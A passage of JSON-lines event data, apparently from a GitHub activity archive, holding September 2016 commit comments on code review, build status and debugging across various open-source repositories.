\n"}},"created_at":"2016-09-22T12:05:39Z"}
{"id":"4602020014","type":"CommitCommentEvent","actor":{"login":"acka47"},"repo":{"name":"hbz/lobid-rdf-to-json"},"payload":{"comment":{"id":19129021,"position":17,"line":17,"path":"src/main/resources/labels.json","commit_id":"cd8369718f77924e94910ab4dc7f5ecbb8f1e337","created_at":"2016-09-22T12:06:01Z","updated_at":"2016-09-22T12:06:01Z","body":"There is a double mapping from `type` to `@type` and `http://www.w3.org/1999/02/22-rdf-syntax-ns#type` The latter was deleted in https://github.com/hbz/lobid-rdf-to-json/commit/00b64177949ca92012c7a440f4a11c02383083c3."}},"created_at":"2016-09-22T12:06:01Z"}
{"id":"4602020707","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19129025,"position":51,"line":51,"path":"idea/src/org/jetbrains/kotlin/idea/ForkJoinPoolPatcherForTeamCityTesting.kt","commit_id":"675575decc9524b9938ea6891015a42c8b629072","created_at":"2016-09-22T12:06:10Z","updated_at":"2016-09-22T12:06:10Z","body":"It's onetime, test-only, TeamCity-only logging, but ok :)"}},"created_at":"2016-09-22T12:06:10Z"}
{"id":"4602022615","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19129033,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T12:06:38Z","updated_at":"2016-09-22T12:06:38Z","body":"@radare -- no improvement with the current version of radare2 \r\nwhat else can I do still wrong?"}},"created_at":"2016-09-22T12:06:38Z"}
{"id":"4602026123","type":"CommitCommentEvent","actor":{"login":"emilyreese"},"repo":{"name":"emilyreese/songs-by-month"},"payload":{"comment":{"id":19129041,"position":null,"line":null,"path":null,"commit_id":"25915e11f165a41035e6c69a04a95d042db11973","created_at":"2016-09-22T12:07:27Z","updated_at":"2016-09-22T12:07:27Z","body":"🎉 nice! Have you thought of using a different text color here though?"}},"created_at":"2016-09-22T12:07:27Z"}
{"id":"4602026263","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19129042,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-22T12:07:28Z","updated_at":"2016-09-22T12:07:28Z","body":":+1: for a less aggressive update strategy. I, too, believe that this update happened too early."}},"created_at":"2016-09-22T12:07:28Z"}
{"id":"4602026281","type":"CommitCommentEvent","actor":{"login":"itsvigun"},"repo":{"name":"dimabarbul/i3blocks"},"payload":{"comment":{"id":19129044,"position":null,"line":null,"path":null,"commit_id":"b409bb520738f3ed3d551d6de054b0c73446f2fb","created_at":"2016-09-22T12:07:29Z","updated_at":"2016-09-22T12:07:29Z","body":"nice!"}},"created_at":"2016-09-22T12:07:29Z"}
{"id":"4602027718","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19129048,"position":null,"line":null,"path":null,"commit_id":"58d838da8663e6ebd881858e950079f72eb72b03","created_at":"2016-09-22T12:07:49Z","updated_at":"2016-09-22T12:07:49Z","body":"With 0, swap takes place only if there is low memory condition. It doesn't disable swap."}},"created_at":"2016-09-22T12:07:49Z"}
{"id":"4602028419","type":"CommitCommentEvent","actor":{"login":"donglua"},"repo":{"name":"donglua/PhotoPicker"},"payload":{"comment":{"id":19129052,"position":null,"line":null,"path":null,"commit_id":"8b99ae7c51ecd9e0e818a9d6543252b3e099b9d5","created_at":"2016-09-22T12:07:59Z","updated_at":"2016-09-22T12:07:59Z","body":"resolve #125 "}},"created_at":"2016-09-22T12:07:59Z"}
{"id":"4602029226","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129054,"position":null,"line":null,"path":null,"commit_id":"ea5fa5063384c7d3db90ce1687e7faadd4b918f0","created_at":"2016-09-22T12:08:10Z","updated_at":"2016-09-22T12:08:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1114](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13929&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T12:08:10Z"}
{"id":"4602034791","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19129064,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T12:09:13Z","updated_at":"2016-09-22T12:09:13Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T12:09:13Z"}
{"id":"4602035053","type":"CommitCommentEvent","actor":{"login":"mfalt"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19129066,"position":39,"line":30,"path":"src/functions/indBox.jl","commit_id":"9798374187a9b561b0fdb8581feebeb8a28cb74a","created_at":"2016-09-22T12:09:17Z","updated_at":"2016-09-22T12:09:17Z","body":"It seems a unnecessary to have so many implementations (one for each combo of real and vector), could we not consider replacing all with the following? I think the compiler would take care of the in-lining the code to achieve the same efficiency.\r\n```julia\r\nlb(f::IndBox{Real,S}, i) = f.lb\r\nlb{T<:RealArray, S}(f::IndBox{T,S}, x, i) = f.lb[i]\r\nub(f::IndBox{Real,S}, i) = f.ub\r\nub{T, S<:RealArray}(f::IndBox{T,S}, x, i) = f.ub[i]\r\n\r\nfunction (f::IndBox)(x::RealArray)\r\n  for k in eachindex(x)\r\n    if x[k] < lb(f,k) || x[k] > ub(f,k)\r\n      return +Inf\r\n    end\r\n    return 0.0\r\nend\r\n\r\nfunction prox!(f::IndBox, x::RealArray, gamma::Real, y::RealArray)\r\n  for k in eachindex(x)\r\n    if x[k] < lb(f,k)\r\n      y[k] = lb(f,k)\r\n    elseif x[k] > ub(f,k)\r\n      y[k] = ub(f,k)\r\n    else\r\n      y[k] = x[k]\r\n    end\r\n  end\r\n  return 0.0\r\nend\r\n```"}},"created_at":"2016-09-22T12:09:17Z"}
{"id":"4602036810","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"neobuddy89/shamu"},"payload":{"comment":{"id":19129072,"position":null,"line":null,"path":null,"commit_id":"699fed9b510c4e0f916beabcb414f2bf180e2dc5","created_at":"2016-09-22T12:09:41Z","updated_at":"2016-09-22T12:09:41Z","body":"Need to add tunables to allow tuning and find best value."}},"created_at":"2016-09-22T12:09:41Z"}
{"id":"4602036938","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19129073,"position":97,"line":168,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetReaderUtility.java","commit_id":"0d57f05536098ba001f02e3e5374b3ae8c707559","created_at":"2016-09-22T12:09:43Z","updated_at":"2016-09-22T12:09:43Z","body":"remove"}},"created_at":"2016-09-22T12:09:43Z"}
{"id":"4602043155","type":"CommitCommentEvent","actor":{"login":"trav90"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":19129102,"position":null,"line":null,"path":null,"commit_id":"1204d1f0562b3195ce9bfc603f8d1af6949d9c5f","created_at":"2016-09-22T12:11:06Z","updated_at":"2016-09-22T12:11:06Z","body":"@Antonius32 - That sounds good to me! "}},"created_at":"2016-09-22T12:11:06Z"}
{"id":"4602045004","type":"CommitCommentEvent","actor":{"login":"Perelandric"},"repo":{"name":"ponylang/ponyc"},"payload":{"comment":{"id":19129108,"position":5,"line":28,"path":"packages/assert/assert.pony","commit_id":"3544e46a03e1bc3f001115982661109759152bdc","created_at":"2016-09-22T12:11:32Z","updated_at":"2016-09-22T12:11:32Z","body":"`trim` and `trim_in_place` do not, so that allocation is avoided. I think `from_iso_array` as well.\r\n\r\n```pony\r\n\"foobar\".trim(0, 3).is_null_terminated() // false\r\n```"}},"created_at":"2016-09-22T12:11:32Z"}
{"id":"4602046535","type":"CommitCommentEvent","actor":{"login":"mfalt"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19129113,"position":39,"line":30,"path":"src/functions/indBox.jl","commit_id":"9798374187a9b561b0fdb8581feebeb8a28cb74a","created_at":"2016-09-22T12:11:54Z","updated_at":"2016-09-22T12:11:54Z","body":"The reason why this should still be fast in julia is that when, for example `prox!` is called, it will compile the function for that specific combination of Real and Array, thus knowing which of the lb/ub it will later call."}},"created_at":"2016-09-22T12:11:54Z"}
{"id":"4602052840","type":"CommitCommentEvent","actor":{"login":"r-zemblys"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19129126,"position":null,"line":null,"path":null,"commit_id":"fc5417d033a9af9832a579ac464b721f3c446306","created_at":"2016-09-22T12:13:27Z","updated_at":"2016-09-22T12:13:27Z","body":"Doesn't this always result to 0. , as 1/int = 0 ?"}},"created_at":"2016-09-22T12:13:27Z"}
{"id":"4602059915","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19129152,"position":51,"line":51,"path":"idea/src/org/jetbrains/kotlin/idea/ForkJoinPoolPatcherForTeamCityTesting.kt","commit_id":"675575decc9524b9938ea6891015a42c8b629072","created_at":"2016-09-22T12:15:07Z","updated_at":"2016-09-22T12:15:07Z","body":"I decided to move it to the other place and make it nicer, I think it can be removed in future if it disturbs somebody."}},"created_at":"2016-09-22T12:15:07Z"}
{"id":"4602061571","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19129159,"position":51,"line":51,"path":"idea/src/org/jetbrains/kotlin/idea/ForkJoinPoolPatcherForTeamCityTesting.kt","commit_id":"675575decc9524b9938ea6891015a42c8b629072","created_at":"2016-09-22T12:15:26Z","updated_at":"2016-09-22T12:15:26Z","body":"OK"}},"created_at":"2016-09-22T12:15:26Z"}
{"id":"4602061743","type":"CommitCommentEvent","actor":{"login":"wmdietl"},"repo":{"name":"opprop/checker-framework"},"payload":{"comment":{"id":19129161,"position":null,"line":null,"path":null,"commit_id":"2c8f8bdd3e112d6c48b9220bca7ad1d98f6a089a","created_at":"2016-09-22T12:15:28Z","updated_at":"2016-09-22T12:15:28Z","body":"I'll work on a fix later today. I understand the problem after some discussions yesterday."}},"created_at":"2016-09-22T12:15:28Z"}
{"id":"4602062524","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19129163,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T12:15:39Z","updated_at":"2016-09-22T12:15:39Z","body":"https://we.tl/yYA2cdtz2T"}},"created_at":"2016-09-22T12:15:39Z"}
{"id":"4602062995","type":"CommitCommentEvent","actor":{"login":"ykx33535"},"repo":{"name":"ykx33535/hello_word"},"payload":{"comment":{"id":19129166,"position":2,"line":2,"path":"README.md","commit_id":"6580015967ae0a13b0674d3333d3189e1b82ab62","created_at":"2016-09-22T12:15:46Z","updated_at":"2016-09-22T12:15:46Z","body":"hello"}},"created_at":"2016-09-22T12:15:46Z"}
{"id":"4602067879","type":"CommitCommentEvent","actor":{"login":"ykx33535"},"repo":{"name":"ykx33535/hello_word"},"payload":{"comment":{"id":19129177,"position":null,"line":null,"path":null,"commit_id":"6580015967ae0a13b0674d3333d3189e1b82ab62","created_at":"2016-09-22T12:16:52Z","updated_at":"2016-09-22T12:16:52Z","body":"thefirst fix"}},"created_at":"2016-09-22T12:16:52Z"}
{"id":"4602069602","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19129183,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T12:17:15Z","updated_at":"2016-09-22T12:17:15Z","body":"Sorry, re-read the whole thread, there are several things wrong here: \r\n\r\n* if you want to disassemble N bytes you must use pD, not pd.\r\n* if you want faster disasm use pId\r\n* you can also use asm.slow=false to get faster pD/pd\r\n* e asm.lines=false if you don't need them\r\n\r\nif you want realtime feedback (witohut piping to file) use scr.flush=true"}},"created_at":"2016-09-22T12:17:15Z"}
{"id":"4602071778","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19129188,"position":6,"line":67,"path":"src/ConnectionGraphicsObject.hpp","commit_id":"d0f968ca15f21a7b82a708c114c15e85ecec7e6a","created_at":"2016-09-22T12:17:43Z","updated_at":"2016-09-22T12:17:43Z","body":"not required actually.  you can grab these objects from  ```onnection::getNode(PortType)```"}},"created_at":"2016-09-22T12:17:43Z"}
{"id":"4602072172","type":"CommitCommentEvent","actor":{"login":"mflehmig"},"repo":{"name":"OpenModelica/OMEdit"},"payload":{"comment":{"id":19129191,"position":null,"line":null,"path":null,"commit_id":"45325bdd585001b2f588d00c39ebf1974f489fed","created_at":"2016-09-22T12:17:48Z","updated_at":"2016-09-22T12:17:48Z","body":"Hi, I also had to add #undef smooth to the file OMEdit/OMEditGUI/MainWindow.h in order to avoid a compile error using Qt5 (5.2.1) under Linux using gcc and clang. Both compilers ended up with the following error:\r\n\r\nIn file included from OMC/OMCProxy.cpp:56:\r\nIn file included from OMC/OMCProxy.h:39:\r\nIn file included from ./MainWindow.h:43:\r\nIn file included from /usr/include/qt5/QtWebKitWidgets/QtWebKitWidgets:3:\r\nIn file included from\r\n/usr/include/qt5/QtWebKitWidgets/QtWebKitWidgetsDepends:8:\r\nIn file included from /usr/include/qt5/QtQuick/QtQuick:6:\r\nIn file included from /usr/include/qt5/QtQuick/qquickframebufferobject.h:45:\r\nIn file included from /usr/include/qt5/QtQuick/QQuickItem:1:\r\n/usr/include/qt5/QtQuick/qquickitem.h:262:17: error: too few arguments\r\nprovided to function-like macro invocation\r\n    bool smooth() const;\r\n                ^\r\n../../../../../builds/omc-gcc-github/include/omc/c/openmodelica.h:153:9:\r\nnote: macro 'smooth' defined here\r\n#define smooth(P,EXP)    (EXP)"}},"created_at":"2016-09-22T12:17:48Z"}
{"id":"4602073364","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material-addins"},"payload":{"comment":{"id":19129194,"position":4,"line":31,"path":"src/main/java/gwt/material/design/addins/client/richeditor/MaterialRichEditor.java","commit_id":"49634a95e5a5a94c5be193849a9f39dbf517bd44","created_at":"2016-09-22T12:18:06Z","updated_at":"2016-09-22T12:18:06Z","body":"Oh will remove this."}},"created_at":"2016-09-22T12:18:06Z"}
{"id":"4602075905","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19129205,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T12:18:41Z","updated_at":"2016-09-22T12:18:41Z","body":"also how big is the file you are trying to disassemble? because if you are disassembling 1MB of instructions, this can be 4MB of bytes, being analyzed, computing all reference lines, reading memory dereferences to get disasm hints, analyzing stack access, etc.. this takes some time. but if you use the hints in my previous comment here you should get much better times.\r\n\r\nI dont have the patience to wait 40m :P"}},"created_at":"2016-09-22T12:18:41Z"}
{"id":"4602081802","type":"CommitCommentEvent","actor":{"login":"ibab"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19129226,"position":null,"line":null,"path":null,"commit_id":"fc5417d033a9af9832a579ac464b721f3c446306","created_at":"2016-09-22T12:19:59Z","updated_at":"2016-09-22T12:19:59Z","body":"This might be a Python 2/3 difference.\r\nWhen I run the following code:\r\n```python\r\nimport tensorflow as tf\r\nsess = tf.Session()\r\nprint(sess.run(tf.to_int32(1) / tf.to_int32(2)))\r\n```\r\nit produces `0.5`.\r\nI suspect that a `from __future__ import division` will fix this on Python 2."}},"created_at":"2016-09-22T12:19:59Z"}
{"id":"4602081820","type":"CommitCommentEvent","actor":{"login":"Tom94"},"repo":{"name":"ppy/osu-framework"},"payload":{"comment":{"id":19129227,"position":10,"line":78,"path":"osu.Framework/Lists/LifetimeList.cs","commit_id":"e5a5ced7c8917df22b2893ca5b24369046d306e0","created_at":"2016-09-22T12:19:59Z","updated_at":"2016-09-22T12:19:59Z","body":"Is the base method not virtual / overridable?"}},"created_at":"2016-09-22T12:19:59Z"}
{"id":"4602083382","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"ppy/osu-framework"},"payload":{"comment":{"id":19129231,"position":10,"line":78,"path":"osu.Framework/Lists/LifetimeList.cs","commit_id":"e5a5ced7c8917df22b2893ca5b24369046d306e0","created_at":"2016-09-22T12:20:18Z","updated_at":"2016-09-22T12:20:18Z","body":"in MS's List<T>? nah"}},"created_at":"2016-09-22T12:20:18Z"}
{"id":"4602084509","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129237,"position":null,"line":null,"path":null,"commit_id":"ea5fa5063384c7d3db90ce1687e7faadd4b918f0","created_at":"2016-09-22T12:20:31Z","updated_at":"2016-09-22T12:20:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1114](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13929&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:12:21"}},"created_at":"2016-09-22T12:20:31Z"}
{"id":"4602084903","type":"CommitCommentEvent","actor":{"login":"bromagosa"},"repo":{"name":"bromagosa/morphic.js"},"payload":{"comment":{"id":19129238,"position":6,"line":1250,"path":"morphic.js","commit_id":"27b3c930048e767bc2a59df7dda7e0f63ed3dd4b","created_at":"2016-09-22T12:20:36Z","updated_at":"2016-09-22T12:20:36Z","body":"I actually thing a regex is much more readable than any other alternative, like charcode ranges or lists of all possible word (or non-word) characters. The ReadStream class was a bit of an overkill for just navigating around words, and it didn't solve my problem either, as it only looks for white spaces, not punctuation marks or special chars."}},"created_at":"2016-09-22T12:20:36Z"}
{"id":"4602089667","type":"CommitCommentEvent","actor":{"login":"bromagosa"},"repo":{"name":"bromagosa/morphic.js"},"payload":{"comment":{"id":19129249,"position":65,"line":5223,"path":"morphic.js","commit_id":"27b3c930048e767bc2a59df7dda7e0f63ed3dd4b","created_at":"2016-09-22T12:21:40Z","updated_at":"2016-09-22T12:21:40Z","body":"!0 returns true, which broke selection when starting at the beginning of a string."}},"created_at":"2016-09-22T12:21:40Z"}
{"id":"4602090657","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129253,"position":null,"line":null,"path":null,"commit_id":"eb93d78557e2934a2c66f426302f4855d74e27d8","created_at":"2016-09-22T12:21:53Z","updated_at":"2016-09-22T12:21:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1115](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13934&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T12:21:53Z"}
{"id":"4602096682","type":"CommitCommentEvent","actor":{"login":"vdiravka"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19129265,"position":17,"line":72,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestCorruptParquetDateCorrection.java","commit_id":"0d57f05536098ba001f02e3e5374b3ae8c707559","created_at":"2016-09-22T12:23:10Z","updated_at":"2016-09-22T12:23:10Z","body":"removed"}},"created_at":"2016-09-22T12:23:10Z"}
{"id":"4602097999","type":"CommitCommentEvent","actor":{"login":"MigFerreira"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19129272,"position":6,"line":67,"path":"src/ConnectionGraphicsObject.hpp","commit_id":"d0f968ca15f21a7b82a708c114c15e85ecec7e6a","created_at":"2016-09-22T12:23:26Z","updated_at":"2016-09-22T12:23:26Z","body":"Yes but when the GraphicsObject is deconstructed the connection object doesn't not exist.\nOn 22/09/2016 13:17:46, paceholder <notifications@github.com> wrote:\nnot required actually. you can grab these objects from onnection::getNode(PortType)\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub [https://github.com/MigFerreira/nodeeditor/commit/d0f968ca15f21a7b82a708c114c15e85ecec7e6a#commitcomment-19129188], or mute the thread [https://github.com/notifications/unsubscribe-auth/AAdn-MiUUhA4aDRA32MMVF_ZZWRsBcYpks5qsnHngaJpZM4KD0wl]."}},"created_at":"2016-09-22T12:23:26Z"}
{"id":"4602098343","type":"CommitCommentEvent","actor":{"login":"Bkorotko03"},"repo":{"name":"Bkorotko03/portfolio"},"payload":{"comment":{"id":19129273,"position":null,"line":null,"path":null,"commit_id":"106a81b7754d5078ce90c2532799771d98f14578","created_at":"2016-09-22T12:23:31Z","updated_at":"2016-09-22T12:23:31Z","body":"h"}},"created_at":"2016-09-22T12:23:31Z"}
{"id":"4602098457","type":"CommitCommentEvent","actor":{"login":"vdiravka"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19129274,"position":97,"line":168,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetReaderUtility.java","commit_id":"0d57f05536098ba001f02e3e5374b3ae8c707559","created_at":"2016-09-22T12:23:33Z","updated_at":"2016-09-22T12:23:33Z","body":"replaced this with next comment\r\n// new parquet files are generated with \"is.date.correct\" property have no corruption dates"}},"created_at":"2016-09-22T12:23:33Z"}
{"id":"4602098754","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"boundlessgeo/qgis-testing-environment-docker"},"payload":{"comment":{"id":19129277,"position":null,"line":null,"path":null,"commit_id":"f7638cd9dddb4648e38992d6705155cd2811980c","created_at":"2016-09-22T12:23:37Z","updated_at":"2016-09-22T12:23:37Z","body":"The last commit only alters the behavior when the QGIS Python console was opened by a plugin or manually by the user, in that case the output was completely captured by Scintilla and did not bubble outside of the QGIS Python console.\r\nThe test output was just blank and the test was passing (false negative) because the test was for `FAILED` in the output.\r\nI've added another string test for `Ran ` and `OK` that should also fix this issue.\r\nRegarding #3 I don't see any reason why (when the small conflicts are solved) cannot be merged, it does not seem to address the same problem I had.  \r\n\r\nThank you for your thoughts and help on this project!"}},"created_at":"2016-09-22T12:23:37Z"}
{"id":"4602100921","type":"CommitCommentEvent","actor":{"login":"bromagosa"},"repo":{"name":"bromagosa/morphic.js"},"payload":{"comment":{"id":19129284,"position":114,"line":7911,"path":"morphic.js","commit_id":"27b3c930048e767bc2a59df7dda7e0f63ed3dd4b","created_at":"2016-09-22T12:24:08Z","updated_at":"2016-09-22T12:24:08Z","body":"In this case, I think iterating is more readable than two regex `search`es concatenated."}},"created_at":"2016-09-22T12:24:08Z"}
{"id":"4602101741","type":"CommitCommentEvent","actor":{"login":"akfzambrana"},"repo":{"name":"lorkithen/estudos-mentoria"},"payload":{"comment":{"id":19129286,"position":null,"line":null,"path":null,"commit_id":"703407bd7a9105ae5d529088b9930c3890980f00","created_at":"2016-09-22T12:24:17Z","updated_at":"2016-09-22T12:24:17Z","body":"Vc precisar criar um arquivo dentro do repositorio com este conteudo, aqui é apenas um comentário 😄 "}},"created_at":"2016-09-22T12:24:17Z"}
{"id":"4602101813","type":"CommitCommentEvent","actor":{"login":"r-zemblys"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19129287,"position":null,"line":null,"path":null,"commit_id":"fc5417d033a9af9832a579ac464b721f3c446306","created_at":"2016-09-22T12:24:17Z","updated_at":"2016-09-22T12:24:17Z","body":"Yes, I'm using python 2. So either check of python version and `from __future__ import division`, or simple magnitude = (**1.** / mu) * ((1 + mu)**abs(signal) - 1) fix is needed"}},"created_at":"2016-09-22T12:24:17Z"}
{"id":"4602101792","type":"CommitCommentEvent","actor":{"login":"Nelnir"},"repo":{"name":"Nelnir/Projekt"},"payload":{"comment":{"id":19129288,"position":353,"line":353,"path":"Lista.cpp","commit_id":"3ff37711b9e2ebf0ad08608ee5d12db1f2b16c32","created_at":"2016-09-22T12:24:18Z","updated_at":"2016-09-22T12:24:18Z","body":"coto"}},"created_at":"2016-09-22T12:24:18Z"}
{"id":"4602102791","type":"CommitCommentEvent","actor":{"login":"pmoriarty"},"repo":{"name":"pbzdyl/gradle-clojure"},"payload":{"comment":{"id":19129293,"position":4,"line":44,"path":"README.md","commit_id":"3471b61c9b97bed9a2c1801bbe6445efaad07a3c","created_at":"2016-09-22T12:24:31Z","updated_at":"2016-09-22T12:24:31Z","body":"Would it be worth clarifying here that junit output is in addition to standard clojure.test output?"}},"created_at":"2016-09-22T12:24:31Z"}
{"id":"4602105764","type":"CommitCommentEvent","actor":{"login":"robbyrussell"},"repo":{"name":"robbyrussell/oh-my-zsh"},"payload":{"comment":{"id":19129298,"position":null,"line":null,"path":null,"commit_id":"0d897cca7499a4dd46536acbd999723fd0ca2b5d","created_at":"2016-09-22T12:25:06Z","updated_at":"2016-09-22T12:25:06Z","body":"AWESOME...I think this makes @Gravemind our 1,000th contributor to the project!\r\n\r\nThank you so much. Thanks to everyone. "}},"created_at":"2016-09-22T12:25:06Z"}
{"id":"4602107695","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19129304,"position":8,"line":52,"path":"src/ConnectionGraphicsObject.cpp","commit_id":"d0f968ca15f21a7b82a708c114c15e85ecec7e6a","created_at":"2016-09-22T12:25:31Z","updated_at":"2016-09-22T12:25:31Z","body":"Instead, I would put the following code to the Connection's destructor.\r\n```\r\n if (auto in = _inNode.lock())\r\n {\r\n   in->nodeGraphicsObject()->update();\r\n }\r\n if (auto out = _outNode.lock())\r\n {\r\n   out->nodeGraphicsObject()->update();\r\n }\r\n```\r\n\r\nIt updates attached nodes before the node is destroyed.\r\n"}},"created_at":"2016-09-22T12:25:31Z"}
{"id":"4602107752","type":"CommitCommentEvent","actor":{"login":"vdiravka"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19129305,"position":38,"line":126,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestCorruptParquetDateCorrection.java","commit_id":"0d57f05536098ba001f02e3e5374b3ae8c707559","created_at":"2016-09-22T12:25:32Z","updated_at":"2016-09-22T12:25:32Z","body":"I suppose it is better to leave it. Cause we still check drill version in parquet file meta footer."}},"created_at":"2016-09-22T12:25:32Z"}
{"id":"4602110375","type":"CommitCommentEvent","actor":{"login":"iuriipleskach"},"repo":{"name":"dropbox/SwiftyDropbox"},"payload":{"comment":{"id":19129312,"position":null,"line":null,"path":null,"commit_id":"80964fe11cd5b11c03345455ab7bd6f9c2493768","created_at":"2016-09-22T12:26:06Z","updated_at":"2016-09-22T12:26:06Z","body":"Hi Stephen,\r\nIt appears that SwiftyDropbox.xcodeproj has iOS deployment target set to iOS 10 while the docs and podspec say that the framework should also support iOS 9. Could you confirm that it' safe to change the deployment target to iOS 9? \r\nMaybe it's not an issue when importing the framework using CocoaPods or carthage, but it is when importing the framework by dragging SwiftyDropbox.xcodeproj to my project."}},"created_at":"2016-09-22T12:26:06Z"}
{"id":"4602115755","type":"CommitCommentEvent","actor":{"login":"bmd007"},"repo":{"name":"professormahi/Web-IUT-TA"},"payload":{"comment":{"id":19129333,"position":null,"line":null,"path":null,"commit_id":"9373ad4645d5e6b41f8dbfd57ea32de2f3eaa27c","created_at":"2016-09-22T12:27:18Z","updated_at":"2016-09-22T12:27:18Z","body":":)\r\nفرمتو برا بعدیا رعایت کن دادا"}},"created_at":"2016-09-22T12:27:18Z"}
{"id":"4602120713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19129347,"position":null,"line":null,"path":null,"commit_id":"a601645c36749607ff70b449cc9fa452448f7dab","created_at":"2016-09-22T12:28:24Z","updated_at":"2016-09-22T12:28:24Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 1 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage 